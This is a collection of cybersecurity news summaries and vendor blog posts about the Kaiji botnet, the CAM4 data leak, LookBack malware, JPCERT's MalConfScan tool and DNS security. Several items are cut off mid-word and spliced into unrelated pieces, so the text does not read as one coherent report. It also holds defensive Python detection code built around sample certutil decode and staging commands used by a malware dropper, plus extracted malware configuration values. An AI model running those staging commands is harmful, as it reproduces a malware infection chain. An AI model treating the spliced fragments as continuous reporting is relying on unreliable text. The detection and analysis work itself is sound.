A new Internet of Things (IoT) botnet called “Kaiji” targets IoT devices and servers with SSH brute-force attacks, according to Intezer researchers. The malware utilizes a custom implant, which was dubbed Kaiji by MalwareMustDie, instead of utilizing publicly available ones such as Mirai. Kaiji was built by threat actors in the Golang programming language, which has been increasingly utilized by threat actors. The malware only targets root users while conducting its only method of propagation, SSH brute force, and if Kaiji makes a connection it will launch a bash script to begin the installation process.

Recommendation: Botnet malware typically takes advantage of internet-connected devices that have been misconfigured or do not have security updates applied; however, as Kaiji shows, there are Internet of Things (IoT) botnets that conduct brute-force attacks. Any device that connects to the internet must be treated as a security liability, and default usernames and passwords must be disabled. In addition, changing default port configurations can assist in preventing malware that scans for such configurations. Organizations and defenders should be aware of all their internet-facing assets and have them under strict monitoring.

Tags: Botnet, IoT, Kaiji, SSH brute force

Live Streaming Adult Site Leaves 7 Terabytes of Private Data Exposed

(published: May 4, 2020)

Researchers at SafetyDetectives have identified an exposed database used by the adult streaming website CAM4[.]com which has leaked over seven terabytes of data related to customers. CAM4 is a website used for livestreaming explicit material to adults, and researchers were able to find an unsecured ElasticSearch database containing the personally identifiable information (PII) of the website’s customers. The leaked data includes first name, surname, credit card data, email addresses, and sexual orientation. The U.S.A., Brazil, and Italy were listed as the largest customer bases for the platform, with 10.88 billion records identified in the leak.

Recommendation: Leaks of this sort may put affected individuals at greater risk of phishing attacks. Actors can use this information to craft custom emails to increase the chances that the recipient acts on their malicious content. Individuals who have accounts associated with this incident should change their passwords as soon as possible, particularly if the passwords for those accounts are the same as those used for other online accounts. Individuals should also regularly monitor their credit reports for suspicious activity or consider an identity theft protection service.

MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Exploit Public-Facing Application – T1190

Tags: CAM4, Data leak, PII

Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack

(published: May 4, 2020)

Threat actors over the weekend have been targeting the Ghost publishing platform in resource hijacking campaigns to mine cryptocurrency. Ghost is an open-source publishing platform with over two million customers, including Mozilla and DuckDuckGo. Threat actors were leveraging the vulnerabilities registered as “CVE-2020-11651” and “CVE-2020-11652”, which allow for remote code execution on servers in data centers and in the cloud. The exploit comes from Ghost’s usage of SaltStack, which provides the server management infrastructure of the platform.

Recommendation: Cryptocurrency-mining malware is becoming increasingly common amongst threat actors. As this story portrays, it is important that your company institutes policies regarding software in use and its proper maintenance. New security updates should be applied as soon as possible because they often fix minor bugs that delay workflow as well as critical vulnerabilities that can be exploited by malicious actors. Third-party software vendors must regularly verify that their software is secure to avoid customers falling victim to cyber threats due to the vendors’ own vulnerabilities.

MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Supply Chain Compromise – T1195 | [MITRE ATT&CK] Resource Hijacking – T1496

Tags: Ghost, Resource Hijacking, Cryptocurrency mining, CVE-2020-11651, CVE-2020-11652

This section presents an overview of threats related to ransomware activity against municipal institutions, industrial enterprises and critical infrastructure facilities.


In the past month, 10 more hospitals have fallen victim to Ryuk attacks in the US

WildPressure APT targets industrial systems in the Middle East. ICS attack tools show increasing commodification. TrickMo works against secure banking. Microsoft warns of an RCE vulnerability in the way Windows renders fonts. Click fraud malware found in children’s apps sold in Google Play. DarkHotel attacks the World Health Organization. Ransomware hits Parisian hospitals and a British biomedical research firm. More COVID-19 phishbait. Ben Yelin from UMD CHHS on coronavirus-detecting cameras; our guest is Allan Liska from Recorded Future on security in the time of coronavirus.

For links to all of today’s stories check out our CyberWire daily news brief:


Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

A US gas pipeline operator was infected by malware—your questions answered


Tuesday’s news that a ransomware infection shut down a US pipeline operator for two days has generated no shortage of questions, not to mention a near-endless stream of tweets.

Some observers and arm-chair incident responders consider the event to be extremely serious. That’s because the debilitating malware spread from the unnamed company’s IT network—where email, accounting and other business is conducted—to the company’s operational technology, or OT, network, which automatically monitors and controls critical operations carried out by physical equipment that can create catastrophic accidents when things go wrong.

Others said the reaction to the incident was overblown. They noted that, per the advisory issued on Tuesday, the threat actor never obtained the ability to control or manipulate operations, that the plant never lost control of its operations, and that facility engineers deliberately shut down operations in a controlled manner. This latter group also cited evidence that the infection of the plant’s industrial control systems, or ICS, network appeared to be unintentional on the part of the attackers.


Brazilians Targeted by Resurfaced CamuBot Malware (02/06/2020)

The CamuBot malware has reemerged after a year-long hiatus to resume targeted attacks on the Brazilian financial industry. IBM X-Force researchers assessed CamuBot and found that it impersonates a security application that banks ask users to install and uses tactics similar to those in use by cybercriminal gangs. The attack begins when someone from the attacker’s side phones the victim and instructs him or her over the phone to browse to an infection page that hosts the CamuBot Trojan.

EKANS Ransomware Discovered Targeting ICS Operations (02/04/2020)

Multiple vendors have been analyzing an industrial control systems (ICS) ransomware that emerged in December and can halt various processes related to ICS operations. Dragos, MalwareHunterTeam, and SentinelOne have all assessed the EKANS (also called Snake) ransomware. In its research, Dragos connected EKANS to the MEGACORTEX ransomware and also determined that EKANS terminates the named processes on vic

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about Trend Micro Zero Day Initiative’s $1.5 million in awards and other noteworthy milestones in 2019. Also, learn about a crafty malware that makes you retype your passwords so it can steal them for credit card information and other personal data.

Read on:

Four Reasons Your Cloud Security is Keeping You Up at Night

Organizations are migrating to the cloud for speed, agility, scalability, and cost-efficiency – but they have realized that it demands equally powerful security management. As the cloud continues to attract more businesses, security teams are spending sleepless nights securing the infrastructure. We can reduce the number of security issues affecting cloud infrastructure; however, we must first conquer the possible reasons for security vulnerabilities.

Trend Micro and Baker Hughes Collaborate to Help Deliver Protection for Critical Infrastructure

Trend Micro announced this week that it will collaborate with Baker Hughes’ Nexus Controls operational technology (OT) security experts through a strategic framework agreement, signed in late 2019. Together the companies aim to provide comprehensive, industry leading guidance and support for enterprises running critical OT environments.

Malicious Optimizer and Utility Android Apps on Google Play Communicate with Trojans that Install Malware, Perform Mobile Ad Fraud

Trend Micro recently discovered several malicious optimizer, booster and utility apps (detected as AndroidOS_BadBooster.HRX) on Google Play. The apps can access remote ad configuration servers that can be used for malicious purposes, perform mobile ad fraud, and download as many as 3,000 malware variants or malicious payloads on affected devices.

Zero Day Initiative Bug Hunters Rake in $1.5M in 2019

Zero Day Initiative, a division of Trend Micro, awarded more than $1.5 million in cash and prizes to bug-hunters throughout 2019, resulting in 1,035 security vulnerability advisories for the year. Most of those advisories (88 percent) were published in conjunction with a patch from the vendor.

ICS in VUCA: Insights from the World‘s Biggest ICS Security Event – S4

Many sessions at this year’s S4 discussed strengthening leadership. The environment surrounding the ICS community is filled with volatility, uncertainty, complexity and ambiguity (VUCA), and it requires strong leadership to drive changes. In this blog, read about the key takeaways coming out of the world’s leading ICS security event, S4.

This Crafty Malware Makes You Retype Your Passwords So It Can Steal Them

A trojan malware campaign is targeting online banking users around the world with the aim of stealing credit card information, finances and other personal details. Detailed by researchers at Fortinet, the Metamorfo banking trojan has targeted users of over 20 online banks in countries around the world including the US, Canada, Peru, Chile, Spain, Brazil, Ecuador and Mexico.

SORA and UNSTABLE: 2 Mirai Variants Target Video Surveillance Storage Systems

Trend Micro researchers encountered two variants of the notorious internet of things (IoT) malware, Mirai, employing a new propagation method. The two variants, namely SORA (detected as IoT.Linux.MIRAI.DLEU) and UNSTABLE (detected as IoT.Linux.MIRAI.DLEV), gain entry through Rasilient PixelStor5000 video surveillance storage systems by exploiting CVE-2020-6756.

Vulnerability in WhatsApp Desktop Exposed User Files

Facebook has patched a vulnerability in WhatsApp Desktop that could allow an attacker to launch cross-site scripting (XSS) attacks and access files from the victim’s system when paired with WhatsApp for iPhone. The vulnerability was discovered by PerimeterX security researcher Gal Weizman, who found he could bypass WhatsApp’s CSP to execute code on a target system using maliciously crafted messages.

Ryuk Ransomware Infects US Government Contractor

The internal system of U.S. government contractor Electronic Warfare Associates (EWA) was infected with Ryuk ransomware last week, ZDNet reported. EWA is a contractor that supplies electronic equipment and services to the Department of Defense (DOD), the Department of Homeland Security (DHS), and the Department of Justice (DOJ).

New Lemon Duck Malware Campaign Targets IoT, Large Manufacturers

Printers, smart TVs and automated guided vehicles that depend on Windows 7 have become the latest targets for cybercriminals leveraging a “self-spreading” variant of the malware Lemon Duck. In a report released Wednesday by TrapX Security, researchers warn manufacturers dependent on IoT devices are targets in a new global campaign leveraging the malware variant.

New Extortion Campaign Threatens Victims of the 2015 Ashley Madison Breach

A new extortion campaign is targeting victims of the Ashley Madison data breach that happened five years ago, Vade Secure reports. Avid Life Media — the company behind the site — was hacked in 2015 by a group known as Impact Team. The actors behind this new campaign tell victims that they will publicize proof of their profile as well as other “embarrassing” activities and demand bitcoins as payment. 

Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan

Threat actors behind the Emotet malware used the novel coronavirus (2019-nCoV) scare as a hook for their spam email campaign against targets in Japan. IBM X-Force reported that the coronavirus spam emails were disguised as official notifications sent by a disability welfare provider and public health centers. The email content warns recipients about the rapid spread of the virus and instructs them to download an attached notice that allegedly contains preventive measures.

Researchers Use Smart Light Bulbs to Infiltrate Networks

Researchers successfully infiltrated networks through a vulnerability in Philips Hue light bulbs. The CVE-2020-6007 vulnerability, which involves the Zigbee communication protocol, can be abused to remotely install malicious firmware in smart light bulbs and spread malware to other internet-of-things (IoT) devices.

What was your biggest takeaway from the S4 ICS security conference this year? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Researchers simulated a real-looking “industrial prototyping” organization with fake employees, PLCs, and websites to study the types of cyber-attacks that commonly occur on such networks. The elaborately fake organization’s website and network ran on a highly advanced interactive “honeypot” network built to attract the attention of potential hackers.

The plan was to create such a legitimate-looking network that no one would suspect it was phony, and to accumulate serious information related to cyber-threats and attacks in order to study and analyze them. The motive behind researching these threats and attack mechanisms was to dig out the threats that the “Industrial control system” (ICS) sector faces today. Per sources, the sham company specifically let some ports of its network be susceptible to attack and, voila! It got hit with the most cliché of attacks that any IT network faces, including ransomware, malware, Remote Access Trojans (RAT), crypto-jacking, online fraud and the “botnet-sty

AWS and Google Cloud are back up after unrelated outages early in the week. A German automation tool manufacturer discloses a ransomware infestation. Mobile malware in the spies’ toolkit. The FBI’s Protected Voices shares election security information. Notes from SecurityWeek’s 2019 ICS Cyber Security Conference. NCSC’s annual report. And people have things to say about backdoors, bribes, and those aliens at Area 51. (Chemtrails, too.) Craig Williams from Cisco Talos with an update on Emotet. Our guest is Dave Weinstein from Claroty discussing threats to critical infrastructure.

For links to all of today’s stories check out our CyberWire daily news brief:


Phishers are impersonating engineering license boards to target U.S. utility organizations with LookBack malware.

Between July 19–25, Proofpoint discovered the LookBack campaign when it came across some spear phishing emails purporting to be from the National Council of Examiners for Engineering and Surveying (NCEES). Each of these emails abused the NCEES logo, spoofed the sender address and reply-to fields, and included both member ID numbers and the signature block of a nonexistent NCEES employee.

Supported by these falsified details, the emails used the pretense of a failed examination to trick employees at U.S. utility organizations into opening a Microsoft Word document named Result Notice.doc. This document leveraged VBA macros to install LookBack malware.

Written in C++, the sample of LookBack analyzed by Proofpoint used a proxy communication tool to send data from the infected host to its command-and-control (C&C) server. This malware enabled digital attackers to delete files, execute commands, take screenshots and assume control of the device’s cursor. It also enabled threat actors to view system, process and file data, a capability they could have used to conduct reconnaissance of a targeted utility.

The Rise of ICS Threats

LookBack comes amid a steady rise of threats targeting organizations’ industrial control systems (ICSs). In October 2018, for instance, the critical water utility ONWASA suffered a ransomware attack that limited the functionality of its computer systems. Just a few months later, WIRED reported that researchers had observed a threat actor called XENOTIME probing the networks of at least 20 U.S. electric system targets. This arrived shortly before FireEye unearthed a phishing campaign that targeted organizations in the energy and utilities, government, and oil and gas sectors.

How to Defend Against LookBack Malware

Organizations can strengthen their defenses against malware like LookBack by integrating phishing intelligence with their security information and event management (SIEM) systems to visualize the entire hierarchy of an attack. Companies should also take a layered approach to email security by embracing SIEM, mail scanning tools, perimeter protection solutions and other utilities.

The post Phishers Impersonate Engineering License Boards to Target Utilities With LookBack Malware appeared first on Security Intelligence.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Proofpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to come from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Fraudulently using the NCEES logo, the emails included Word documents embedded with malicious macros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that, when executed, drops three Privacy Enhanced Mail (PEM) files. Certutil.exe is then used to decode the PEM files, which are afterwards restored to their true extensions using essentuti.exe. The resulting files impersonate the names of an open-source binary used by common tools such as Notepad++, and one of them contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once running, LookBack can send and receive numerous commands, such as find files, read files, delete files, write to files, start services, and more.
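To make the staging chain above concrete for defenders, here is an added example (not from the original article, Proofpoint or Nozomi) that runs three detection rules over Sysmon-style process-creation events: certutil invoked with a decode or download switch, escalated when an Office application is the parent; a binary whose PE original filename is CertUtil.exe but whose on-disk name is something else (the example assumes essentuti.exe is such a renamed copy, which the article does not state); and Notepad++’s updater GUP.exe launched from outside its install directory, where a side-loaded libcurl.dll next to it would be picked up. The events are constructed for illustration, and the Office parent list, the certutil switches and the Notepad++ paths are assumptions.

```python
"""
Added example (not code from the original article, Proofpoint or Nozomi):
flag the certutil-based staging chain in process-creation telemetry.
Field names follow Sysmon Event ID 1, but the events below are constructed
for illustration and are not real telemetry.
"""
import ntpath

# Office parents that should not normally launch certutil (assumption).
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# certutil switches commonly abused to decode or fetch payloads (assumption).
CERTUTIL_ABUSE_SWITCHES = ("-decode", "-decodehex", "-urlcache")
# Where the genuine Notepad++ updater lives; an assumption for this example.
NOTEPADPP_DIRS = ("c:\\program files\\notepad++\\", "c:\\program files (x86)\\notepad++\\")

# Constructed sample events (invented for this example).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "OriginalFileName": "WinWord.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\Result Notice.doc"'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"certutil -decode C:\Users\victim\AppData\Local\Temp\stage1.pem C:\Users\victim\AppData\Local\Temp\GUP.exe"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\essentuti.exe",
     "OriginalFileName": "CertUtil.exe",   # assumed renamed copy: version info still says CertUtil
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"essentuti.exe -decode stage2.pem libcurl.dll"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\GUP.exe",
     "OriginalFileName": "gup.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Users\victim\AppData\Local\Temp\GUP.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -verify C:\certs\server.cer"},   # benign admin use
    {"Image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "OriginalFileName": "gup.exe",
     "ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": r'"C:\Program Files\Notepad++\updater\GUP.exe"'},  # genuine updater
]


def _basename(path):
    return ntpath.basename(path).lower()


def classify_event(ev):
    """Return the names of the rules an event matches (empty list if none)."""
    image_path = ev.get("Image", "").lower()
    image = _basename(image_path)
    original = ev.get("OriginalFileName", "").lower()
    parent = _basename(ev.get("ParentImage", ""))
    cmdline = ev.get("CommandLine", "").lower()
    hits = []

    # Rule 1: certutil (matched on PE original filename, so a rename does not
    # evade it) run with a decode/download switch; escalate under an Office parent.
    if original == "certutil.exe" and any(sw in cmdline for sw in CERTUTIL_ABUSE_SWITCHES):
        hits.append("office_spawned_certutil_decode" if parent in OFFICE_PROCESSES
                    else "certutil_decode")

    # Rule 2: version info says CertUtil but the on-disk name differs.
    if original == "certutil.exe" and image != "certutil.exe":
        hits.append("renamed_certutil")

    # Rule 3: the Notepad++ updater started from outside its install directory,
    # where a libcurl.dll dropped beside it would be loaded instead of the real one.
    if image == "gup.exe" and not image_path.startswith(NOTEPADPP_DIRS):
        hits.append("gup_outside_notepadpp_dir")
    return hits


def scan(events):
    """Run every rule over every event; returns (event_index, rule_name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify_event(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print("event %d: %s -> %s" % (idx, SAMPLE_EVENTS[idx]["Image"], rule))
```

Matching on OriginalFileName rather than the image path is the point of rule 2: a renamed LOLBin keeps its PE version resource, so the rename step in the chain becomes a signal rather than an evasion. Rule 1 will also fire on legitimate certificate work, so in production it is the Office parent that should drive the alert severity.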

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Given the nature of the threat, it is important to have multiple controls in place to detect the related activity. This includes continuous security awareness training so that employees and personnel can better recognise fake and malicious emails. Beyond spam filters and firewalls, Nozomi Networks Labs recommends combining anomaly detection technologies, which identify unusual behaviour, with traditional threat detection capabilities, which provide additional context around suspicious actors linked to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT


Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. A malware configuration contains various types of information that provide many clues for incident handling, for example the details of communication with other hosts and the techniques the malware uses to persist. This time, we will introduce a plugin, “MalConfScan with Cuckoo”, that automatically extracts malware configuration using MalConfScan (see the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs within Cuckoo, enabling automatic extraction of malware configuration. Figure 1 shows Cuckoo’s behaviour with “MalConfScan with Cuckoo” installed.

Figure 1: Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs the malware on the analysis machine (the sandbox guest) to extract its configuration. When malware is submitted to Cuckoo and executed on the analysis machine, a memory image is dumped, from which MalConfScan extracts the configuration of known malware. The extracted configuration is then shown in the report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub

Instruction and report example

First, submit the malware to a Cuckoo instance that has “MalConfScan with Cuckoo” installed, using either the web GUI or the command line. The official Cuckoo documentation [1] describes the submission procedure in detail. When the submission and analysis are complete, a report is produced as in Figure 2.

Figure 2: Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

"malconfscan": {
    "data": [
        {
            "malconf": [
                {"Server1": ""},
                {"Server2": ""},
                {"Server3": ""},
                {"Server4": ""},
                {"Port": "443"},
                {"Mode": "TCP and HTTP"},
                {"ID": "2017-11-28-MACRO"},
                {"Mutex": "Q34894iq"},
                {"Key": "usotsuki"},
                {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"},
                {"Proxy server": ""},
                {"Proxy username": ""},
                {"Proxy password": ""}
            ],
            "vad_base_addr": "0x04521984",
            "process_name": "iexplore.exe",
            "process_id": "2248",
            "malware_name": "Himawari",
            "size": "0x00815104"
        }
    ]
}
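The fragment above is what any consumer of report.json has to parse: “malconf” is a list of single-key objects rather than one object, and the address and size are hex strings. The following is an added example, not part of JPCERT/CC’s plugin, that flattens that list and pulls out the indicators an incident handler would pivot on (C2 hosts, port, mutex, user agent) together with the memory region for carving the unpacked code. The embedded report is constructed in the shape shown above with placeholder server names; it is not a real Cuckoo report.

```python
"""
Added example (not code from JPCERT/CC's MalConfScan or the Cuckoo plugin):
turn a MalConfScan-with-Cuckoo report.json fragment into actionable indicators.
The embedded report is constructed with placeholder server names.
"""
import json

# Constructed report fragment in the shape shown in the article; not a real Cuckoo report.
REPORT_JSON = r'''
{
  "malconfscan": {
    "data": [
      {
        "malconf": [
          {"Server1": "c2.example.invalid"},
          {"Server2": "backup.example.invalid"},
          {"Server3": ""},
          {"Server4": ""},
          {"Port": "443"},
          {"Mode": "TCP and HTTP"},
          {"ID": "2017-11-28-MACRO"},
          {"Mutex": "Q34894iq"},
          {"Key": "usotsuki"},
          {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"},
          {"Proxy server": ""},
          {"Proxy username": ""},
          {"Proxy password": ""}
        ],
        "vad_base_addr": "0x04521984",
        "process_name": "iexplore.exe",
        "process_id": "2248",
        "malware_name": "Himawari",
        "size": "0x00815104"
      }
    ]
  }
}
'''


def flatten_malconf(entries):
    """MalConfScan emits the config as a list of single-key objects; merge them
    into one dict. A later duplicate key wins, as in a naive JSON object merge."""
    merged = {}
    for entry in entries:
        merged.update(entry)
    return merged


def extract_iocs(report):
    """One record per detected implant: network IOCs, host IOCs and the memory
    region (VAD base and size) in which MalConfScan found the unpacked code."""
    records = []
    for hit in report["malconfscan"]["data"]:
        conf = flatten_malconf(hit.get("malconf", []))
        # Every populated "ServerN" field is a C2 candidate; empty slots are skipped.
        c2 = [v for k, v in conf.items() if k.lower().startswith("server") and v]
        port = conf.get("Port", "")
        records.append({
            "malware": hit["malware_name"],
            "process": "%s (pid %s)" % (hit["process_name"], hit["process_id"]),
            "region": (int(hit["vad_base_addr"], 16), int(hit["size"], 16)),
            "c2": c2,
            "port": int(port) if port.isdigit() else None,
            "mode": conf.get("Mode"),
            "mutex": conf.get("Mutex"),
            "user_agent": conf.get("UserAgent"),
        })
    return records


def iocs_from_report_text(text):
    """Parse report.json text and return the IOC records."""
    return extract_iocs(json.loads(text))


if __name__ == "__main__":
    for rec in iocs_from_report_text(REPORT_JSON):
        print(rec)
```

The mutex is worth keeping next to the network indicators: it is a host-side artefact that survives a C2 change between variants, which is exactly the situation the series opens with.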

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub

The plugin has been tested in the following environment:

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium

In closing

This plugin enables extracting the configuration of known malware from a sandbox run. Even where the malware has anti-VM or anti-sandbox functions, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Black Hat USA 2019; we look forward to active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese]

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware: they share most of their code and differ only slightly in configuration, such as the C&C servers. This means that, for such samples, much of the analysis is complete once the configuration has been extracted from the malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensics tool. In most cases, malware analysis begins with unpacking the malware in order to extract its configuration. MalConfScan instead extracts the configuration from the unpacked executable as it is loaded in memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes in a memory image and list the strings they refer to

Figure 1 is an example of malconfscan execution. First, the name of the process the malware was injected into (Name), its process ID (PID) and the name of the detected malware (Malware Name) are displayed. The malware configuration (Config info) follows.

Figure 1: malconfscan execution result (detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

Figure 2: malconfscan execution result (detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.


malstrscan detects process hollowing in memory and lists the strings that the hollowed process refers to. Although malware configuration is usually stored encoded, the malware decodes it whenever it needs the information, and the decoded form is sometimes left behind in memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

Figure 3: malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
HawkEye Keylogger
Smoke Loader
Poison Ivy
NanoCore RAT

The list of malware variants identified during June shows a return of WannaCry and Tinba activity.

The trend is still that the ten most frequently identified variants account for more than 60 percent of all malware identifications.

The distribution of the most frequently occurring malware names for June 2019 is as follows:


Keywords: malware. Read more about the malware top 10 for June.

Security researchers from Palo Alto Networks’ Unit 42 team have discovered CookieMiner, macOS malware designed to “steal” the cookies associated with cryptocurrency exchange websites.

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.¹

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. The traditional network security solutions used to combat the current cyber-crime wave have only increased complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices (human-controlled and otherwise) as part of ransomware campaigns, to steal sensitive data, or for other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network… Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.²

We should always remind ourselves of the statement above by John Kindervag and add to our focus ways to prevent data exfiltration to unauthorized destinations from our networks. Companies have typically leveraged endpoint solutions, in addition to other network elements, to protect against the malware used for that purpose. However, to combat today’s cyber-criminals, companies need to embrace a defense-in-depth security strategy in which every network layer used to access data is secured, and that includes the DNS layer.

DNS is an often overlooked layer for security, yet it is integral to network functionality. It is the protocol we use to locate resources on a network. We use it to reach our favorite websites, whether news or social media; to reach printers and storage devices; to reach the security cameras in the data center; and even to send email. It is also used by unsuspecting victims to reach the phishing websites from which malware is downloaded, and by malware itself to locate its control servers on the internet. Those servers can serve as the destination for data stolen from digital assets inside companies (again using the DNS protocol), and as the source of the keys used to encrypt digital assets as part of ransomware activities.

